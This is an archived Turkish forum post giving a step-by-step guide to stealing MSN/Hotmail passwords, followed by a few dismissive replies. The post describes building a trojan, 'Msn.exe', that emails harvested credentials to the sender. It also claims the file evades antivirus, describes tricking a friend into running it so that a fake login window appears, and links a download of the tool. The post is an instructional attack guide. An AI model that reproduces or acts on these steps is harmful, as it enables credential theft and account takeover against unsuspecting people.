Web Stats BoraOyun Evden Eve Nakliyat

Anasayfa

Web Ateşi Paylaşım Platformu - aytug akdogan ödüllü 1. seo yarışması ve yurtta barış dünyada barış. Eğlence, Geyik Oyunlar, Komik Resimler, Videolar, Şarkı Sözleri, Slayt Gösterileri, Güncel Haberler, Ders Ödev indir, Sağlık, Oto modifiye Full Oyun - Msn şifresini Çalmak İçin Farklı Bir Yöntem

Web Ateşi Paylaşım Platformu - aytug akdogan ödüllü 1. seo yarışması ve yurtta barış dünyada barış. Eğlence, Geyik Oyunlar, Komik Resimler, Videolar, Şarkı Sözleri, Slayt Gösterileri, Güncel Haberler, Ders Ödev indir, Sağlık, Oto modifiye Full Oyun

Tam Sürüm: Msn şifresini Çalmak İçin Farklı Bir Yöntem
Şu anda tam olmayan bir sürümü görüntülüyorsunuz. Tam sürümü görmek için, buraya tıklayın
Zipten çıkan programlardan:
1)Edit server'ı açıyorsunuz
2)General settings den Open server'ı tıklayın
3)Edit Serer ile aynı dizinde olan hotmailhack.exe adlı dosyayı seçiyorsunuz.
4)Email settings e dosyayı kime göndericekseniz onun mail adresini yazıyorsunuz.(Kurbanınızın mail adresini)
5)Sonra apply settings den build exe server'ı seçiyorsunuz ve serverınıza bir ad veriyorsunuz.
6)Programdan çıkıyorsunuz.

Verdiğimiz dosya adı Msn.exe olsun. bu dosya hiç 1 antivirüs firewall benzeri alete yakalanmaz.
Msn.exe yi arkadaşımıza gönderiyoruz. O açınca, Messenger'ı kapanıyor ve karşısına fake bir "log in" bölümü açılıyor. mailve şifresi ile giriş yapıyor.
Siz onla bir konuşma penceresi açıyorsunuz ve $$$ yazıyorsunuz.
Ve Şifre Elinizde...

http://www.elitec0ders.net/headfuck.zip
allıntı
bırakın hacki macki
gelin msnde tanış olalım
işi kolay kılalımlım
bilgisayarı hack için icat etmediler
internet ne sana ne bana kalmaz
ya kardes bosverın ya hack demek sıfre calmak degıldır ısı programsız calmaktır bırak bu ıslerı su devlet ıslerı ben kactane hack sıtesınde uyelım ama ıcde benım verdıgım programları ben beyenmedım demedıler hem tsk yaztılar
Bu Üyemiz ALıntı Nicten dolayı banlanmıstr..
Referans URL